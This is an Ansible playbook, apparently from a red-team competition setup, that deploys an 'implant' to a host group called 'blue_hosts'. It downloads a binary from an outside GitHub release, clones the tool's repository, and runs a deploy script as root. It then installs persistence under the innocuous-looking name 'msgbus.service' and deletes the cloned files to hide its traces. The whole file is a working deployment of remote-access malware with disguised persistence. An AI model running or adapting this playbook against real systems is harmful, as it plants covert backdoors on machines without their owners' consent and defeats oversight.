---
# Deploy implant on remote hosts
- name: Deploy implant
  hosts: blue_hosts
  vars:
    implant_url: "https://github.com/vaughnw128/shelly/releases/download/v0.0.6/implant"
  remote_user: ansible
  become: yes
  tasks:

    - name: download implant
      ansible.builtin.get_url:
        url: "{{ implant_url }}"
        dest: "/tmp/implant"
        mode: '0777'
        owner: root
      
    - name: Clone repo
      git:
        repo: https://github.com/vaughnw128/shelly.git
        dest: /tmp/shelly
        clone: yes
        update: yes

    - name: Copy systemd job to systemd 
      copy: remote_src=True src=/tmp/shelly/deploy/msgbus.service dest=/etc/systemd/system/msgbus.service

    - name: Execute the deploy script
      command: sh /tmp/shelly/deploy/deploy.sh

    - name: start systemd app service
      systemd: name=msgbus.service state=restarted enabled=yes
      become: yes

    - name: Delete content & directory
      ansible.builtin.file:
        state: absent
        path: /tmp/shelly

